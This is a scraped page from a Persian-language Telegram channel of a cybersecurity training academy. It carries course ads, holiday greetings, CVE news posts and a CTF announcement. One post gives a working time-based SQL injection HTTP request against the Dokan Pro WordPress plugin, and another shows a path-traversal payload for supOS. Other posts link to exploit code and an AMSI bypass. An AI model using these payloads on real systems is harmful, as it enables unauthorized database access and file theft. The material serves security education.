KASRAONE @kasraone_com Channel on Telegram

KASRAONE

@kasraone_com


...................﷽........................
🐞باگ‌ها را شکار کنیم، کد را بهتر کنیم👨‍💻
برگزاری دوره‌های برنامه نویسی و امنیت سایبری
آدرس سایت 🌐
kasraone.ir
تلفن☎️:
۰۵۱۴-۳۲۲۴۱۶۸
آیدی پشتیبان
🆔️ : @academykasraone

آدرس گروه کسری وان

🌐 : @kasraonegap

KASRAONE (Persian)

با عضویت در کانال تلگرام KASRAONE، وارد دنیای جذاب برنامه نویسی و امنیت سایبری شوید. این کانال به شما فرصت می‌دهد تا باگ‌ها را شکار کنید و بهترین کدها را بنویسید. همچنین، با حضور در دوره‌های آموزشی ارائه شده در این کانال، مهارت‌های برنامه نویسی و امنیت سایبری خود را بهبود بخشید. آدرس وبسایت رسمی کانال به آدرس kasraone.ir می‌باشد. همچنین، می‌توانید با تلفن ۰۵۱۴-۳۲۲۴۱۶۸ تماس بگیرید یا از آیدی پشتیبان @academykasraone برای دریافت اطلاعات بیشتر استفاده کنید. برای پیوستن به گروه کسری وان نیز می‌توانید به آدرس @kasraonegap مراجعه کنید. پس از عضویت در این کانال، علاوه بر یادگیری مفاهیم جدید، با جامعه‌ای فعال از برنامه نویسان و متخصصان امنیت سایبری آشنا خواهید شد. از این طریق، می‌توانید با افراد هم‌رده خود دیگری رشد کرده و تجربیات خود را به اشتراک بگذارید.

KASRAONE

11 Jan, 07:27


⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

💠 تست نفوذ را رایگان یاد بگیر .
⭕️ @TryHackBox

📖 کتاب ها و منابع Cyber Security
📚 @LibrarySecOfficial

💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ...
⭕️ @TryHackBoxOfficial

💠 منابع BlueTeam :
⭕️ @BlueTeamKit

💠 ابزارها و دوره های OSINT
⭕️ @OsintGit

💠 برگزاری دوره های امنیت سایبری
⭕️ @kasraone_com

💠 تمامی منابع Red Team اینجاست!
💠 آموزش توسعه بدافزار (رایگان)
⭕️ @RedTeamVillageRTV

💠 منابع CTF و رایت آپ ها و دوره های HackTheBox  :
⭕️ @PfkCTF

💠پنتست وب رو یاد بگیر
⭕️ @GitBook_s

💠 دوره های آموزشی - CVE-Exploit
⭕️ @HackTheBox_Academy

💠 برای اضافه شدن در لیست تبادلات پیام دهید :
🤖 @Unique_exploitbot

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

KASRAONE

20 Dec, 17:46


یلدا یعنی یادمان باشد که زندگی آن قدر کوتاه است که یک دقیقه بیشتر با هم بودن را باید جشن گرفت.
❤️یلدایتان مبارک

آکادمی کسری وان

KASRAONE

18 Nov, 18:49


🧑‍💻 آموزش مفاهیم تست نفوذ را با ما تجربه کنید :
[+] تست نفوذ شبکه و وب را بصورت تخصصی یاد بگیر .
[+] زبان ++C برای هکرها و فراتر !
[+]ابزار نویسی و اکسپلویت نویسی با پایتون را صفر تا صد پیاده سازی کنید.
[+]مفاهیم پایه امنیت را با ما یاد بگیر .
[+]نکات و ابزار ها و کار با ابزارهای امنیتی و مقاله های امنیت را در کانال ما دنبال کنید .
[+]پیش نیازهای ورود به دنیای تست نفوذ را با ما تجربه کنید و مشاوره بگیرید.
[+]چگونه و از کجا هک را شروع کنیم ؟قبلاً فیلم هکرهایی را تماشا کرده اید؟
[+] اندروید هکینگ
[+] اصول اولیه PowerShell و جاوا اسکریپت رو برای تست نفوذ یاد بگیرید.
[+] مقدمه ای بر امنیت سایبری
و کلی مباحث و مفاهیم دیگر را با ما تجربه کنید .
به دنیای آموزش رایگان تست نفوذ خوش اومدید .

@hakfateam

KASRAONE

17 Nov, 06:33


🔴 CVE

Dokan Pro SQL-CVE-2024-3922

POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
Host: 127.0.0.1

{"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}}

#exploit

         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

11 Oct, 05:00


مشکل امنیتی RCE (CVE-2024-36435) در کنترل‌گر مدیریت برد اصلی (BMC) سوپر میکرو 🚨

یک آسیب‌پذیری امنیتی ⚠️ در سیستم‌عامل کنترل‌گر مدیریت برد اصلی (BMC) 🖥️ که جزئی حیاتی از زیرساخت‌های مدرن مراکز داده 🏢 است، کشف شده است. این آسیب‌پذیری به مهاجمان 🦹‍♂️ اجازه می‌دهد تا از راه دور 🌐 و بدون نیاز به احراز هویت 🚫، کد دلخواه را اجرا کنند 💻.

به زبان ساده‌تر، هر کسی می‌تواند با ارسال یک درخواست ساده ✉️، کنترل سیستم 🎛️ را در دست بگیرد و کدهای مخرب 🦠 را اجرا کند. این حمله از طریق یک نقص 🐞 در نحوه مدیریت پشته (Stack Overflow) 💥 انجام می‌شود.

اطلاعات بیشتر:

* کد اثبات مفهوم (POC): [لینک] 🔗




         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

03 Oct, 06:57


تحلیل بدافزارهای اندروید

تحلیل دینامیکی بدافزارهای اندروید به دلیل محدودیت‌های ابزارهای دیباگر، چالش‌برانگیزتر از بدافزارهای ویندوز است. این نوع تحلیل به بررسی رفتار نرم‌افزار در حین اجرا می‌پردازد تا آسیب‌های احتمالی بدافزارها شناسایی شود.



📌 نکات کلیدی:

1. چالش‌ها:
   - تحلیل بدافزارهای اندروید نیازمند ابزارها و تکنیک‌های خاصی است که به دلیل پیچیدگی‌های سیستم‌عامل دشوار است. ⚙️

2. دیباگرها:
   - این ابزارها برای بررسی کد در حین اجرا استفاده می‌شوند، اما در اندروید با محدودیت‌هایی روبه‌رو هستند. 🛠️

3. Frida:
   - ابزاری قدرتمند برای تحلیل و مهندسی معکوس که امکان اتصال دینامیک متدها را فراهم می‌کند، اما نظارت بر وضعیت آن‌ها دشوار است. 🔍



🌐 آدرس وبلاگ

Blog

Boost



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

29 Aug, 06:28


کارگاه‌های آموزشی ویژه در حوزه هوش و امنیت سایبری

🧠 WORKSHOP LISA Institute 
"فرصت‌های حرفه‌ای در هوش، OSINT و هوش سایبری" 
👉 ثبت نام کنید 

🌈 WORKSHOP COLORIURIS 
"شواهد تایید شده در OSINT" 
👉 ثبت نام کنید 

🔒 کارگاه آموزشی INCIBE 
«INCIBE-CERT: چگونه امنیت سایبری جامعه را بهبود بخشیم» 
👉 ثبت نام کنید 

🚀 فرصت را از دست ندهید و به جمع ما بپیوندید! 🌍



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

10 Jul, 10:55


🔴CVE

CVE-2024-39937

LINK NEWS

این CVE به مشکل امنیتی خاصی در supOS 5.0 اشاره دارد که به کمک آن افراد می‌توانند از طریق فراخوانی API با پارامتر fileName=../ به دایرکتوری های دیگر در سیستم دسترسی پیدا کنند و فایل‌های آن را بخوانند. این مشکل امنیتی می‌تواند به سرقت اطلاعات حساس منجر شود و نیازمند بروزرسانی و رفع آن است تا از سوء استفاده از آن جلوگیری شود.

api/image/download?fileName=../



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

05 Jul, 03:48


۴ نفر تا به الان درست بوده

و وب سایت بسته است الان انشالله تا امشب وب سایت درست و گذاشته میشود

با تشکر

🔴 لینک جدیدهCTF

XSS Attack!


http://challenge1kasra.iapp.ir/

KASRAONE

04 Jul, 05:28


به چالش CTF خوش آمدید!

آیا شما آماده هستید تا با استفاده از باگ XSS، پرچم را فتح کنید؟

آدرس آسیب پذیر برای این مسابقه
است. http://challenge1kasra.iapp.ir/

تنها باگ مورد تایید در اینجا XSS است و تنها به یک نوع کد آسیب پذیر است.

آیا شما می‌توانید از این باگ به بهترین شکل استفاده کنید و به جایگاه برتری دست یابید؟ منتظر دیدار شما در این چالش هیجان انگیز
هستیم!

برای ارسال تایید فتح به آیدی @academykasraone پیام بدهید.

امیدوارم موفق باشید و به جایگاه برتری دست یابید!


#CTF


Welcome to the CTF Challenge!

Are you ready to conquer the flag using XSS bugs?

Vulnerable address for this match
It is http://challenge1kasra.iapp.ir/ .

The only confirmed bug here is XSS, and it's only vulnerable to one type of code.

Can you make the best use of this bug and reach the top position? Waiting to meet you in this exciting challenge
Are!

Send message to @academykasraone id to send confirmation of victory.

I hope you will be successful and achieve the best position!


#CTF

KASRAONE

25 Jun, 12:08


عید کمال دین . سالروز اتمام نعمت و هنگامه اعلان وصایت و ولایت
امیر المومنین علیه السلام
بر شیعیان و پیروان ولایت خجسته باد

عید غدیر مبارک


شرکت کسری ارتباط پارس

KASRAONE

16 Jun, 18:23


🔴 Exploit


Magento RCE Exploit



Git Hub




         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

28 May, 16:25


آسیب پذیری که منجر به AMSI BYPASS موثر می شود



AMSİ (Antimalware Scan Interface)BYPASS

آسیب پذیری است که به دلیل نقص در رابط AMSI در ویندوز، اجازه می دهد تا برنامه های مخرب AMSI را برای دستکاری و یا اجرای فایل های مخرب از طریق AMSI بیشتر از حد مورد تشخیص قرار دهند.

⚠️ این آسیب پذیری می تواند به نفع حملات malware و exploit های مخرب استفاده شود.


News

POC -





         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

20 May, 06:27


با نهایت تأسف و تأثر، از درگذشت رئیس جمهوره کشوره عزیزمان ایران تسلیت به تمامی مردم ایران عزیز.

این خبر تلخ برای همه ما یک زمینه از غم و اندوه فراهم کرده است. آرزو دارم خداوند به خانواده و دوستان ایشان صبر و شکیبایی
عطا فرماید.

شرکت کسری ارتباط پارس 🖤

KASRAONE

14 May, 16:08


🔴CVE



CVE-2024-4294

یک آسیب‌پذیری، که به عنوان بحرانی طبقه‌بندی شده بود، در PHPGurukul Doctor

Appointment Management System 1.0

یافت شد. تحت تأثیر این مشکل برخی از

عملکردهای ناشناخته فایل
/doctor/view-appointment-detail.php است. دستکاری آرگومان editid منجر به کنترل
نامناسب شناسه های منبع می شود. حمله ممکن است از راه دور انجام شود. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد.
VDB-262226

شناسه ای است که به این آسیب پذیری اختصاص داده شده است.


         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

08 May, 12:00


🔴 مجموعه ای از منابع برای مهندسی معکوس لینوکس


Link News



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

29 Apr, 04:36


🔴 CVE-2024-21338


آسیب پذیری LPE از Admin تا Kernel در سیستم عامل های ویندوز 10 و ویندوز 11 با HVCI فعال است.

Link News



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

25 Apr, 15:10


🔴CVE-2024-0986

Issabel PBX 4.0.0 Remote Code Execution (Authenticated) -


Link News


         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

23 Apr, 09:54


فهرستی از منابع (کتاب، آموزش، دوره ها، ابزارها
و برنامه های کاربردی آسیب پذیر) برای یادگیری
در مورد توسعه Exploit


Link News



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

KASRAONE

17 Apr, 19:08


جایزه 5500 دلاری برای آسیب‌پذیری تزریق تایید نشده SQL در پلاگین وردپرس LayerSlider وصله شده است.



Link News




         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone